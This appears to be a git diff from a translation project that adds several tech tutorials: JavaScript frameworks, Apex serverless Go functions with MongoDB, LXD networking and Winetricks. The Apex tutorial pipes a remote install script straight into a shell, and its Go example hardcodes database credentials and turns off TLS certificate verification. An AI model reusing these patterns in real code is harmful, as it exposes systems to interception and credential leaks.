PayPal, Netflix, Dropbox, etc. + +I would highly recommend this Framework if you just need a front-end development Framework to build an incredibly complex and awesome UI through the power View Layers, but you are experienced enough to handle any kind of JavaScript code, and when you don't require the other components (as you can integrate them yourself). + +**3) Ember** + +** + ![Ember](https://discoversdkcdn.azureedge.net/postscontent/Ember.js_Logo_and_Mascot.png) +** + +This JavaScript Framework was released in 2011 as an open-source project by _Yehuda Katz_. It has a huge active community online, so the moment you face any problem, you can ask them. It uses many common JavaScript idioms and best practices to ensure that developers get the best right out of the box. + +It uses **Model–view–viewmodel (MVVM)** design pattern, which is slightly different than MVC in the sense that it has a _binder _to help the communication between the view and data binder. + +For the fast server-side rendering of a DOM programming interface, it takes the help of **_Fastboot.js_**, so the resulting applications have extremely enhanced performance of complex UIs. + +Its modern routing and model engine supports **_RESTful APIs_**, so you are ensured that you are using the latest technology. It supports Handlebars integrated templates that update the data changes automatically. + +In 2015, it was named the best JavaScript Framework, competing against AngularJS and React, which should be enough to convince you about its usability and desirability in the JavaScript community. + +I would personally highly recommended this JavaScript Framework to those who don't necessarily need great flexibility or a large infrastructure, and just prefer to get things done for coping with deadlines. + +**4) Adonis** + +** + ![Adonis](https://discoversdkcdn.azureedge.net/postscontent/products/adonis.jpg) +** + +If you have ever used _Laravel _and _NodeJS_, then you will feel extremely comfortable using this Framework, as it combines the power of these both platforms resulting in an entity that looks incredibly professional, polished and yet sophisticated for any kind of modern application. + +It uses _NodeJS_, and thus it's pretty much a back-end framework with several front-end features (unlike the previous JavaScript Frameworks that I mentioned that were mostly front-end frameworks), so newbie developers who are into back-end development will find this framework quite attractive. + +Many developers prefer _SQL _databases (due to their increased interaction with data and several other features) over _NoSQL_, so this is reflected in this framework, which makes it relatively more compliant with the standard and more accessible to the average developer. + +If you are the part of any PHP community, then you must know about the **Service Providers**, thankfully, Adonis also has the same PHP like flavour in it, so you will feel at home using it. + +Of all its best features, it has an extremely powerful routing engine which supports all the functions for organizing and managing application states, an error handling mechanism, SQL ORM for writing database queries, generators, arrow functions, proxies and so on. + +I would recommend this Framework if you love to use stateless REST APIs for building server-side applications, as you will be quite attracted to it. + +**5) Vue.js** + +** + ![Vue.js](https://discoversdkcdn.azureedge.net/postscontent/products/vuejs-logo.png) +** + +This open-source JavaScript framework was released in 2014, supporting an extremely simple API for developing the _Reactive _components for Modern Web Interfaces. Its design emphasized the ease of use. Like Ember, it uses the **Model–view–viewmodel (MVVM)** design paradigm which helpes in the simplification of the design. + +The attractive feature in this framework is that you can use selective modules with it for your specific needs. For example, you need to write  simple HTML code, grab the JSON and create a Vue instance to create the small effects that can reused! + +Similar to previous JavaScript Frameworks, it uses two-way data binding to update the model and view, plus it also uses binder for communication between the view and data binder. This is not a full-blown Framework as it focuses entirely on the View Layer, so you would need to take care of other components on your own. + +If you are familiar with **_AngularJS_**, then you will feel at home here, as it heavily incorporates the architecture of **_AngularJS_**, so many projects can be easily transferred to this Framework if you know the basics of JavaScript. + +I would highly recommend this JavaScript Framework if you just want to get things done or gain JavaScript programming experience, or if you need to learn the nature of different JavaScript Frameworks. + +**6) Backbone.js** + +** + ![Backbone.JS](https://discoversdkcdn.azureedge.net/postscontent/products/backbonejs.png) +** + +This framework can be easily integrated to any third-party template engine, however, by default it supports _Underscore _templates, which is the only dependency (along with **JQuery**), thus it is known for its extremely lightweight nature. It has the **RESTful JSON** interface with the support of **MVC (Model–view–controller)** design paradigm (that updates the front-end and back-end automatically). + +If you ever used the famous social news networking service **reddit**, then you will be interested to hear that it uses the **Backbone.js** for several of its single-page applications. The original author of the **Backbone.js** created the _Underscore _templates as well as _CoffeScript_, so you are assured that the developer knows his stuff. + +This framework provides models with key-value, views and several modules within a single bundle, so you don't need to download the other external packages, saving you time. The source-code is available on Github, which means you can further modify it for your needs. + +If you are just looking for a startup framework to quickly build single-page applications, then this framework is for you. + +**Conclusion** + +So, I have just highlighted the 6 Best JavaScript Frameworks in this article in the hopes that it will help you determine the best JavaScript Framework for your tasks. + +If you’re still having trouble deciding the best JavaScript Framework out there, then please understand that the world values action and not perfectionism; it's better to pick any from the list and then find out if it suits your interests, and if it doesn't then just try the next one. Rest assured though that any Framework from the list will be good enough. + +-------------------------------------------------------------------------------- + +via: http://www.discoversdk.com/blog/6-best-javascript-frameworks-to-learn-in-2016 + +作者:[By Danyal Zia ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.discoversdk.com/blog/6-best-javascript-frameworks-to-learn-in-2016 diff --git a/sources/tech/20161006 Go Serverless with Apex and Composes MongoDB.md b/sources/tech/20161006 Go Serverless with Apex and Composes MongoDB.md new file mode 100644 index 0000000000..2365341b66 --- /dev/null +++ b/sources/tech/20161006 Go Serverless with Apex and Composes MongoDB.md @@ -0,0 +1,201 @@ +# Go Serverless with Apex and Compose's MongoDB + +_Apex is tooling that wraps the development and deployment experience for AWS Lambda functions. It provides a local command line tool which can create security contexts, deploy functions, and even tail cloud logs. While AWS's Lambda service treats each function as an independent unit, Apex provides a framework which treats a set of functions as a project. Plus, it even extends the service to languages beyond just Java, Javascript, and Python such as Go._ + +Two years ago the creator of Express, the almost de facto web framework for NodeJS, said [goodbye][12] to the Node community and turned his attention to Go, the backend services language from Google, and Lambdas, the Functions as a Service offering from AWS. While one developer's actions don't make a trend, it is interesting to look at the project he has been working on named [Apex][13] because it may portend some changes in how a good portion of the web will be delivered in the future. + +##### What is a Lambda? + +Currently, if one doesn't run their own hardware they pay to run some kind of virtual server in the cloud. On it they deploy a complete stack such as Node, Express, and a custom application. Or if they have gone further with something like a Heroku or Bluemix, then they deploy their full application to some preconfigured container that already has Node setup and they just deploy the application's code. + +The next step up the abstraction ladder is to deploy just the functions themselves to the cloud without even a full application. These functions can then be triggered by a variety of external events. For example, AWS's API Gateway service can proxy HTTP requests as events to these functions and the Function as a Service provider will execute the mapped function on demand. + +###### Getting Started with Apex + +Apex is a command line tool which wraps the AWS CLI (Command Line Interface). So, the first step to getting started with Apex is to ensure that you have the command line tools from AWS installed and configured (see [AWS CLI Getting Started][14] or [Apex documentation][15]). + +Next install Apex: + +`curl https://raw.githubusercontent.com/apex/apex/master/install.sh | sh` + +Then create a directory for your new project and run: + +`apex init` + + ![apexInit](https://res.cloudinary.com/dyyck73ly/image/upload/v1475620758/nzjk1pi1rce1yarbp6xl.png) + +This sets up some of the necessary security policies and even appends the project name to the functions since the Lambda namespace is flat. It also creates some config and the functions directory with a default "Hello World" style function in Javascript. + + ![tree](https://res.cloudinary.com/dyyck73ly/image/upload/v1475620765/bbsb8h6nkc9nx2qs0foa.png) + +One of the nice things about Apex/Lambdas is that creating a function is really straightforward. Create a new directory with the name of your function and then in that create the program. To use Go, you could create a directory named `simpleGo` then in that create a small `main` program: + + ![tree2](https://res.cloudinary.com/dyyck73ly/image/upload/v1475620769/lthziblpv8iod2muyqwn.png) + +``` +// serverless/functions/simpleGo/main.go +package main + +import ( + "encoding/json" + "github.com/apex/go-apex" + "log" +) + +type helloEvent struct { + Hello string `json:"hello"` +} + +func main() { + apex.HandleFunc(func(event json.RawMessage, ctx *apex.Context) (interface{}, error) { + var h helloEvent + if err := json.Unmarshal(event, &h); err != nil { + return nil, err + } + log.Print("event.hello:", h.Hello) + return h, nil + }) +} +``` + +Apex uses a NodeJS shim, since Node is a supported runtime of Lambda, to call the binary which is created from the above program. It passes the `event` into the binary's STDIN and takes the `value` returned from the binary's STDOUT. It logs via STDERR. The `apex.HandleFunc` manages all of the piping for you. Really it is a very simple solution in the Unix tradition. You can even test it from the command line locally with a `go run main.go`: + + ![goRun](https://res.cloudinary.com/dyyck73ly/image/upload/v1475620784/ddb0vkcef50pnjgfdqn7.png) + +Deploying to the cloud is trivial with Apex: + + ![apexDeploy](https://res.cloudinary.com/dyyck73ly/image/upload/v1475620790/x6l8qg2vticpxhzi7kl3.png) + +Notice that it namespaced your function, managed versioning, and even had a place for some `env` things which we could have used for multiple development environments like `staging` and `production`. + +Executing on the cloud is trivial too with `apex invoke`: + + ![apexInvoke](https://res.cloudinary.com/dyyck73ly/image/upload/v1475620796/jccxskukvy5utgegy2hr.png) + +And we can even tail some logs: + + ![apexLog](https://res.cloudinary.com/dyyck73ly/image/upload/v1475620802/ym3z6w8ojmrq7pucr5bp.png) + +Those are results from AWS CloudWatch. They are available in the AWS UI but when developing it is much faster to follow them like this in another terminal. + +##### What's Inside? + +It is instructive to see inside the artifact that is actually deployed. Apex packages up the shim and everything needed for the function to run. Plus, it goes ahead and configures things like the entry point and security roles: + + ![lambdaConfig](https://res.cloudinary.com/dyyck73ly/image/upload/v1475620812/zz6qwocvuhhl4lq6bf4p.png) + +The Lambda service actually accepts a zip archive with all of the dependencies which it deploys to the servers that execute the function. We can use `apex build ` to create an archive locally which we can then unzip to explore: + + ![apexBuild](https://res.cloudinary.com/dyyck73ly/image/upload/v1475620818/ybidaj2i2ijurjbcqrx2.png) + +The `_apex_index.js handle` function is the original entry point. It sets up some environment variables and then calls into `index.js`.  +The `index.js` spawns a child process of the `main` Go binary and wires everything together. + +##### Go Further with `mgo` + +The Golang driver for MongoDB is called `mgo`. Using Apex to create a function that connects to Compose's MongoDB is almost as straightforward as the `simpleGo`function which we have been reviewing. Here we'll create a new function by adding a directory called `mgoGo` and creating another `main.go`: + +``` +// serverless/functions/mgoGo/main.go + +package main + +import ( + "crypto/tls" + "encoding/json" + "github.com/apex/go-apex" + "gopkg.in/mgo.v2" + "log" + "net" +) + +type person struct { + Name string `json:"name"` + Email string `json:"email"` +} + +func main() { + apex.HandleFunc(func(event json.RawMessage, ctx *apex.Context) (interface{}, error) { + tlsConfig := &tls.Config{} + tlsConfig.InsecureSkipVerify = true + + //connect URL: + // "mongodb://:@:,:/ + dialInfo, err := mgo.ParseURL("mongodb://apex:mountain@aws-us-west-2-portal.0.dblayer.com:15188, aws-us-west-2-portal.1.dblayer.com:15188/signups") + dialInfo.DialServer = func(addr *mgo.ServerAddr) (net.Conn, error) { + conn, err := tls.Dial("tcp", addr.String(), tlsConfig) + return conn, err + } + session, err := mgo.DialWithInfo(dialInfo) + if err != nil { + log.Fatal("uh oh. bad Dial.") + panic(err) + } + defer session.Close() + log.Print("Connected!") + + var p person + if err := json.Unmarshal(event, &p); err != nil { + log.Fatal(err) + } + + c := session.DB("signups").C("people") + err = c.Insert(&p) + if err != nil { + log.Fatal(err) + } + + log.Print("Created: ", p.Name," - ", p.Email) + return p, nil + }) +} +``` + +Post deploy. We can invoke with the correct kind of event to mimic calling an API: + + ![apexMgo](https://res.cloudinary.com/dyyck73ly/image/upload/v1475620829/jeprb3r6qrgjkzblkhho.png) + +The net result is to `insert` into [MongoDB on Compose][16]: + + ![composeDeploy](https://res.cloudinary.com/dyyck73ly/image/upload/v1475620833/vdy8hjiwxpe02evgqwcm.png) + +##### So Much More... + +While we have covered a lot of ground so far with Apex there are many more things to explore. There is integration with [Terraform][17]. You could deliver a polyglot language project with Javascript, Java, Python and Go if you so desired. You could configure multiple environments for things like development, staging, and production. You could tweak the runtime resources by sizing memory and timeouts which effects pricing. And you could hook functions up to the API Gateway to deliver an HTTP API or use something like SNS (Simple Notification Service) to build pipelines of functions in the cloud. + +Like most things, Apex and Lambdas aren't perfect for every scenario. Functions with high IO waits defeat the purpose of paying for compute time. But, adding a tool to your toolbox that requires no infrastructure management on your part at all makes good sense. + +-------------------------------------------------------------------------------- + +作者简介: + +Hays Hutton writes code and then writes about it. Love this article? Head over to [Hays Hutton’s author page][a] and keep reading. + +-------------------------------------------------------------------------------- + +via: https://www.compose.com/articles/go-serverless-with-apex-and-composes-mongodb/ + +作者:[Hays Hutton][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.compose.com/articles/author/hays-hutton/ +[1]:https://twitter.com/share?text=Go%20Serverless%20with%20Apex%20and%20Compose%27s%20MongoDB&url=https://www.compose.com/articles/go-serverless-with-apex-and-composes-mongodb/&via=composeio +[2]:https://www.facebook.com/sharer/sharer.php?u=https://www.compose.com/articles/go-serverless-with-apex-and-composes-mongodb/ +[3]:https://plus.google.com/share?url=https://www.compose.com/articles/go-serverless-with-apex-and-composes-mongodb/ +[4]:http://news.ycombinator.com/submitlink?u=https://www.compose.com/articles/go-serverless-with-apex-and-composes-mongodb/&t=Go%20Serverless%20with%20Apex%20and%20Compose%27s%20MongoDB +[5]:https://www.compose.com/articles/rss/ +[6]:https://unsplash.com/@esaiastann +[7]:https://www.compose.com/articles +[8]:https://www.compose.com/articles/tag/go/ +[9]:https://www.compose.com/articles/tag/mgo/ +[10]:https://www.compose.com/articles/tag/mongodb/ +[11]:https://www.compose.com/articles/go-serverless-with-apex-and-composes-mongodb/#search +[12]:https://medium.com/@tjholowaychuk/farewell-node-js-4ba9e7f3e52b#.dc9vkeybx +[13]:http://apex.run/ +[14]:http://docs.aws.amazon.com/cli/latest/userguide/cli-chap-getting-started.html +[15]:http://apex.run/ +[16]:https://www.compose.com/articles/composes-new-primetime-mongodb/ +[17]:https://www.terraform.io/ diff --git a/sources/tech/20161027 Network management with LXD.md b/sources/tech/20161027 Network management with LXD.md new file mode 100644 index 0000000000..4c0f72c79a --- /dev/null +++ b/sources/tech/20161027 Network management with LXD.md @@ -0,0 +1,210 @@ +# Network management with LXD (2.3+) + + ![LXD logo](https://linuxcontainers.org/static/img/containers.png) + +### Introduction + + +When LXD 2.0 shipped with Ubuntu 16.04, LXD networking was pretty simple. You could either use that “lxdbr0” bridge that “lxd init” would have you configure, provide your own or just use an existing physical interface for your containers. + +While this certainly worked, it was a bit confusing because most of that bridge configuration happened outside of LXD in the Ubuntu packaging. Those scripts could only support a single bridge and none of this was exposed over the API, making remote configuration a bit of a pain. + +That was all until LXD 2.3 when LXD finally grew its own network management API and command line tools to match. This post is an attempt at an overview of those new capabilities. + +### Basic networking + +Right out of the box, LXD 2.3 comes with no network defined at all. “lxd init” will offer to set one up for you and attach it to all new containers by default, but let’s do it by hand to see what’s going on under the hood. + +To create a new network with a random IPv4 and IPv6 subnet and NAT enabled, just run: + +``` +stgraber@castiana:~$ lxc network create testbr0 +Network testbr0 created +``` + +You can then look at its config with: + +``` +stgraber@castiana:~$ lxc network show testbr0 +name: testbr0 +config: + ipv4.address: 10.150.19.1/24 + ipv4.nat: "true" + ipv6.address: fd42:474b:622d:259d::1/64 + ipv6.nat: "true" +managed: true +type: bridge +usedby: [] +``` + +If you don’t want those auto-configured subnets, you can go with: + +``` +stgraber@castiana:~$ lxc network create testbr0 ipv6.address=none ipv4.address=10.0.3.1/24 ipv4.nat=true +Network testbr0 created +``` + +Which will result in: + +``` +stgraber@castiana:~$ lxc network show testbr0 +name: testbr0 +config: + ipv4.address: 10.0.3.1/24 + ipv4.nat: "true" + ipv6.address: none +managed: true +type: bridge +usedby: [] +``` + +Having a network created and running won’t do you much good if your containers aren’t using it. +To have your newly created network attached to all containers, you can simply do: + +``` +stgraber@castiana:~$ lxc network attach-profile testbr0 default eth0 +``` + +To attach a network to a single existing container, you can do: + +``` +stgraber@castiana:~$ lxc network attach my-container default eth0 +``` + +Now, lets say you have openvswitch installed on that machine and want to convert that bridge to an OVS bridge, just change the driver property: + +``` +stgraber@castiana:~$ lxc network set testbr0 bridge.driver openvswitch +``` + +If you want to do a bunch of changes all at once, “lxc network edit” will let you edit the network configuration interactively in your text editor. + +### Static leases and port security + +One of the nice thing with having LXD manage the DHCP server for you is that it makes managing DHCP leases much simpler. All you need is a container-specific nic device and the right property set. + +``` +root@yak:~# lxc init ubuntu:16.04 c1 +Creating c1 +root@yak:~# lxc network attach testbr0 c1 eth0 +root@yak:~# lxc config device set c1 eth0 ipv4.address 10.0.3.123 +root@yak:~# lxc start c1 +root@yak:~# lxc list c1 ++------+---------+-------------------+------+------------+-----------+ +| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS | ++------+---------+-------------------+------+------------+-----------+ +| c1 | RUNNING | 10.0.3.123 (eth0) | | PERSISTENT | 0 | ++------+---------+-------------------+------+------------+-----------+ +``` + +And same goes for IPv6 but with the “ipv6.address” property instead. + +Similarly, if you want to prevent your container from ever changing its MAC address or forwarding traffic for any other MAC address (such as nesting), you can enable port security with: + +``` +root@yak:~# lxc config device set c1 eth0 security.mac_filtering true +``` + +### DNS + +LXD runs a DNS server on the bridge. On top of letting you set the DNS domain for the bridge (“dns.domain” network property), it also supports 3 different operating modes (“dns.mode”): + +* “managed” will have one DNS record per container, matching its name and known IP addresses. The container cannot alter this record through DHCP. +* “dynamic” allows the containers to self-register in the DNS through DHCP. So whatever hostname the container sends during the DHCP negotiation ends up in DNS. +* “none” is for a simple recursive DNS server without any kind of local DNS records. + +The default mode is “managed” and is typically the safest and most convenient as it provides DNS records for containers but doesn’t let them spoof each other’s records by sending fake hostnames over DHCP. + +### Using tunnels + +On top of all that, LXD also supports connecting to other hosts using GRE or VXLAN tunnels. + +A LXD network can have any number of tunnels attached to it, making it easy to create networks spanning multiple hosts. This is mostly useful for development, test and demo uses, with production environment usually preferring VLANs for that kind of segmentation. + +So say, you want a basic “testbr0” network running with IPv4 and IPv6 on host “edfu” and want to spawn containers using it on host “djanet”. The easiest way to do that is by using a multicast VXLAN tunnel. This type of tunnels only works when both hosts are on the same physical segment. + +``` +root@edfu:~# lxc network create testbr0 tunnel.lan.protocol=vxlan +Network testbr0 created +root@edfu:~# lxc network attach-profile testbr0 default eth0 +``` + +This defines a “testbr0” bridge on host “edfu” and sets up a multicast VXLAN tunnel on it for other hosts to join it. In this setup, “edfu” will be the one acting as a router for that network, providing DHCP, DNS, … the other hosts will just be forwarding traffic over the tunnel. + +``` +root@djanet:~# lxc network create testbr0 ipv4.address=none ipv6.address=none tunnel.lan.protocol=vxlan +Network testbr0 created +root@djanet:~# lxc network attach-profile testbr0 default eth0 +``` + +Now you can start containers on either host and see them getting IP from the same address pool and communicate directly with each other through the tunnel. + +As mentioned earlier, this uses multicast, which usually won’t do you much good when crossing routers. For those cases, you can use VXLAN in unicast mode or a good old GRE tunnel. + +To join another host using GRE, first configure the main host with: + +``` +root@edfu:~# lxc network set testbr0 tunnel.nuturo.protocol gre +root@edfu:~# lxc network set testbr0 tunnel.nuturo.local 172.17.16.2 +root@edfu:~# lxc network set testbr0 tunnel.nuturo.remote 172.17.16.9 +``` + +And then the “client” host with: + +``` +root@nuturo:~# lxc network create testbr0 ipv4.address=none ipv6.address=none tunnel.edfu.protocol=gre tunnel.edfu.local=172.17.16.9 tunnel.edfu.remote=172.17.16.2 +Network testbr0 created +root@nuturo:~# lxc network attach-profile testbr0 default eth0 +``` + +If you’d rather use vxlan, just do: + +``` +root@edfu:~# lxc network set testbr0 tunnel.edfu.id 10 +root@edfu:~# lxc network set testbr0 tunnel.edfu.protocol vxlan +``` + +And: + +``` +root@nuturo:~# lxc network set testbr0 tunnel.edfu.id 10 +root@nuturo:~# lxc network set testbr0 tunnel.edfu.protocol vxlan +``` + +The tunnel id is required here to avoid conflicting with the already configured multicast vxlan tunnel. + +And that’s how you make cross-host networking easily with recent LXD! + +### Conclusion + +LXD now makes it very easy to define anything from a simple single-host network to a very complex cross-host network for thousands of containers. It also makes it very simple to define a new network just for a few containers or add a second device to a container, connecting it to a separate private network. + +While this post goes through most of the different features we support, there are quite a few more knobs that can be used to fine tune the LXD network experience. +A full list can be found here: [https://github.com/lxc/lxd/blob/master/doc/configuration.md][2] + +# Extra information + +The main LXD website is at: [https://linuxcontainers.org/lxd +][3]Development happens on Github at: [https://github.com/lxc/lxd][4] +Mailing-list support happens on: [https://lists.linuxcontainers.org][5] +IRC support happens in: #lxcontainers on irc.freenode.net +Try LXD online: [https://linuxcontainers.org/lxd/try-it][6] + +-------------------------------------------------------------------------------- + +via: https://www.stgraber.org/2016/10/27/network-management-with-lxd-2-3/ + +作者:[Stéphane Graber][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.stgraber.org/author/stgraber/ +[1]:https://www.stgraber.org/author/stgraber/ +[2]:https://github.com/lxc/lxd/blob/master/doc/configuration.md#network-configuration +[3]:https://linuxcontainers.org/lxd +[4]:https://github.com/lxc/lxd +[5]:https://lists.linuxcontainers.org/ +[6]:https://linuxcontainers.org/lxd/try-it +[7]:https://www.stgraber.org/2016/10/27/network-management-with-lxd-2-3/ diff --git a/sources/tech/20161028 Configuring WINE with Winetricks.md b/sources/tech/20161028 Configuring WINE with Winetricks.md new file mode 100644 index 0000000000..6019c1485f --- /dev/null +++ b/sources/tech/20161028 Configuring WINE with Winetricks.md @@ -0,0 +1,95 @@ +### Configuring WINE with Winetricks + +Contents + +* * [1. Introduction][1] + * [2. Installing][2] + * [3. Fonts][3] + * [4. .dlls and Components][4] + * [5. Registry][5] + * [6. Closing][6] + * [7. Table of Contents][7] + +### Introduction + +If `winecfg` is a screwdriver, `winetricks` is a power drill. They both have their place, but `winetricks` is just a much more powerful tool. Actually, it even has the ability to launch `winecfg`.  + +While `winecfg` gives you the ability to change the settings of WINE itself, `winetricks` gives you the ability to modify the actual Windows layer. It allows you to install important components like `.dlls` and system fonts as well as giving you the capability to edit the Windows registry. It also has a task manager, an uninstall utility, and file browser.  + +Even though `winetricks` can do all of this, the majority of the time, you're going to be using it to manage `dlls` and Windows components. + +### Installing + +Unlike `winecfg`, `winetricks` doesn't come with WINE. That's fine, though, since it's actually just a script, so it's very easy to download and use on any distribution. Now, many distributions do package `winetricks`. You can definitely use the packaged version if you'd like. Sometimes, those packages fall out-of-date, so this guide is going to use the script, since it's both current and universal. By default, the graphical window is fairly ugly, so if you'd prefer a stylized window, install `zenity` through your distribution's package manager.  + +Assuming that you want `winetricks` in your `/home` directory, `cd` there and `wget` the script. +``` +$ cd ~ +$ wget https://raw.githubusercontent.com/Winetricks/winetricks/master/src/winetricks +``` +Then, make the script executable. +``` +$ chmod+x winetricks +``` +`winetricks` can be run in the command line, specifying what needs to be installed at the end of the command, but in most cases, you won't know the exact names of the `.dlls` or fonts that you're trying to install. For that reason, the graphical utility is best. Launching it really isn't any different. Just don't specify anything on the end. +``` +$ ~/winetricks +``` + + ![The winetricks main menu](https://linuxconfig.org/images/winetricks-main.png) + + +When the window first opens, it will display a menu with options including "View help" and "Install an application." By default, "Select the default wineprefix" will be selected. That's the primary option that you will use. The others may work, but aren't really recommended. To proceed, click "OK," and you will be brought to the menu for that WINE prefix.Everything that you will need to do through `winetricks` can be done through this prefix menu.  + + ![The winetricks prefix menu](https://linuxconfig.org/images/winetricks-prefix.png) + + +### Fonts + + ![The winetricks font menu](https://linuxconfig.org/images/winetricks-font.png) + + +Fonts are surprisingly important. Some applications won't load or won't load properly without them.`winetricks` makes installing many common Windows fonts very easy. From the prefix menu, select the "Install a font" radio button and press "OK."  + +You will be presented with a new list of fonts and corresponding checkboxes. It's hard to say exactly which fonts you will need, so most of this should be decided on a per-application basis, but it's usually a good idea to install `corefonts`. It contains the major Windows system fonts that many applications would be expecting to be present on a Windows machine. Installing them can't really hurt anything, so just having them is usually best.  + +To install `corefonts`, check the corresponding checkbox and press "OK." You will be given roughly the same install prompts as you would on Windows, and the fonts will be installed. When it's done, you will be taken back to the prefix menu. Follow that same process for each additional font that you need. + +### .dlls and Components + + ![The winetricks dll menu](https://linuxconfig.org/images/winetricks-dll.png) + + +`winetricks` tries to make installing Windows `.dll` files and other components as simple as possible. If you need to install them, select "Install a Windows DLL or component" on the prefix menu and click "OK."  + +The window will switch over to a menu of available `dlls` and other Windows components. Using the corresponding checkboxes, check off any that you need, and click "OK." The script will download each selected component and begin installing them via the usual Windows install process. Follow the prompts like you would on a Windows machine. Expect error messages. Many times, the Windows installers will present errors, but you will then receive windows from `winetricks` stating that it is following a workaround. That is perfectly normal. Depending on the component, you may or may not receive a success message. Just ensure that the box is still checked in the menu when the install is complete. + +### Registry + + ![WINE regedit](https://linuxconfig.org/images/winetricks-regedit.png) + + +It's not all that often that you have to edit registry values in WINE, but with some programs, you may. Technically, `winetricks` doesn't provide the registry editor, but it makes accessing it easier. Select "Run regedit" from the prefix menu and press "OK." A basic Windows registry editor will open up. Actually creating registry values is a bit out of the scope of this guide, but adding entries isn't too hard if you already know what you're entering. The registry acts sort of like a spreadsheet, so you can just plug in the right values into the right cells. That's somewhat of an oversimplification, but it works. You can usually find exactly what needs to be added or edited on the WINE Appdb `https://appdb.winehq.org`. + +### Closing + +There's obviously much more that can be done with `winetricks`, but the purpose of this guide is to give you the basic knowledge that you'll need to use this powerful tool to get your programs up and running through WINE. The WINE Appdb is a wealth of knowledge on a per-program basis, and will be an invaluable resource going forward. + +-------------------------------------------------------------------------------- + +via: https://linuxconfig.org/configuring-wine-with-winetricks + +作者:[Nick Congleton][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://linuxconfig.org/configuring-wine-with-winetricks +[1]:https://linuxconfig.org/configuring-wine-with-winetricks#h1-introduction +[2]:https://linuxconfig.org/configuring-wine-with-winetricks#h2-installing +[3]:https://linuxconfig.org/configuring-wine-with-winetricks#h3-fonts +[4]:https://linuxconfig.org/configuring-wine-with-winetricks#h4-dlls-and-components +[5]:https://linuxconfig.org/configuring-wine-with-winetricks#h5-registry +[6]:https://linuxconfig.org/configuring-wine-with-winetricks#h6-closing +[7]:https://linuxconfig.org/configuring-wine-with-winetricks#h7-table-of-contents diff --git a/sources/tech/20161214 The Cost of Native Mobile App Development is Too Damn High.md b/sources/tech/20161214 The Cost of Native Mobile App Development is Too Damn High.md deleted file mode 100644 index 62f07f6b22..0000000000 --- a/sources/tech/20161214 The Cost of Native Mobile App Development is Too Damn High.md +++ /dev/null @@ -1,225 +0,0 @@ -The Cost of Native Mobile App Development is Too Damn High! -============================================================ - -### A value proposition - -_A tipping point has been reached._ With the exception of a few unique use cases, it no longer makes sense to build and maintain your mobile applications using native frameworks and native development teams. - - ![](https://cdn-images-1.medium.com/max/1000/1*4nyeufIIgw9B7nMSr5Sybg.jpeg) - -Average cost of employing iOS, Android, and JavaScript developers in the United States ([http://www.indeed.com/salary][1], [http://www.payscale.com/research/US/Skill=JavaScript/Salary][2]) - -The cost of native mobile application development has been spiraling out of control for the past few years. It has become increasingly difficult for new startups without substantial funding to create native apps, MVPs and prototypes. Existing companies, who need to hold on to talent in order to iterate on existing applications or build new applications, are [fighting][6] [tooth][7]and [nail][8] [with companies from all around the world][9] and will do whatever it takes to retain the best of the best. - - ![](https://cdn-images-1.medium.com/max/800/1*imThyh2e45RW1np0xXIE4Q.png) - -Cost of developing an MVP early 2015, Native vs Hybrid ([Comomentum.com][3]) - -### So what does this mean for all of us? - -If you are a huge company or you are flush with cash, the old thinking was that as long as you threw enough money at native application development, you did not have anything to worry about. This is no longer the case. - -Facebook, the last company in the world who you would think of as behind in the war for talent (because they aren’t), was facing problems with their native app that money could not fix. The application had gotten so large and complex that [they were seeing compilation times of up to 15 minutes for their mobile app][10]. This means that even testing minor user interface changes, like moving something around by a couple of points, could take hours (or even days). - -In addition to the long compilation times, any time they needed to test a small change to their mobile, app it needed to be implemented and tested in two completely different environments (iOS and Android) with teams working with different languages and frameworks, muddying the waters even more. - -Facebook’s solution to this problem is [React Native][11]. - -### What about ditching Mobile Apps for Web only? - -[Some people think mobile apps are doomed.][12] While I really enjoy and respect [Eric Elliott][13] and his work, let’s take a look at some recent data and discuss some opposing viewpoints: - - - ![](https://cdn-images-1.medium.com/max/800/1*s0O7X2PgIqP5_zselxQdqQ.png) - -Time spent in mobile apps (April 2016, [smartinsights.com][4]) - -> 90% of Time on Mobile is Spent in Apps - -There are 2.5 billion people on mobile phones in the world right now. [That number is going to be 5 billion sooner than we think.][14] _It is absolutely insane to think that leaving 4.5 billion people out of your business or application makes sense__ in most scenarios._ - -The old argument was that native mobile application development was too expensive for most companies. While this was true, the cost of web development is also on the rise, with [the average salary of a JavaScript developer in the US being in the range of $97,000.00][15]. - -With the increased complexity and skyrocketing demand for high quality web development, the average price for a JavaScript developer is inching towards that of a Native developer. Arguing that web development is cheaper is no longer a valid argument. - -### What about Hybrid? - -Hybrid apps are HTML5 apps that are wrapped inside of a native container and provide access to native platform features. Cordova and PhoneGap are prime examples. - -_If you’re looking to build an MVP, prototype, or are not worried about the user experience mimicking that of a native app, then a hybrid app may work for you, keeping in mind the entire project will need to be rewritten if you do end up wanting to go native._ - -There are many innovative things going on in this space, my favorite being the [Ionic Framework][16]. Hybrid is getting better and better, but it is still not as fluid or natural feeling as Native. - -For many companies, including most serious startups as well as medium and large sized companies, hybrid apps may not deliver the quality that they want and that their customers demand, leaving the feeling unpolished and less professional. - -[While I have read and heard that of the top 100 apps on the app store, zero of them are hybrid,][17] I have not been able to back up this claim with evidence, but I would not doubt if the number were between zero and 5, and this is for a reason. - -> [Our Biggest Mistake Was Betting Too Much On HTML5 ][18]— Mark Zuckerberg - -### The solution - -If you’ve been keeping up with the mobile development landscape you have undoubtedly heard of projects such as [NativeScript][19] and [React Native][20]. - -These projects allow you to build native quality mobile applications with JavaScript and use the same fundamental UI building blocks as regular iOS and Android apps. - -With React Native you can have a single engineer or team of engineers specialize in cross platform mobile app development, [native desktop development][21], and even web development [using the existing codebase][22] or [the underlying technology][23], shipping your applications to the App Store, the Play Store, and the Web for a fraction 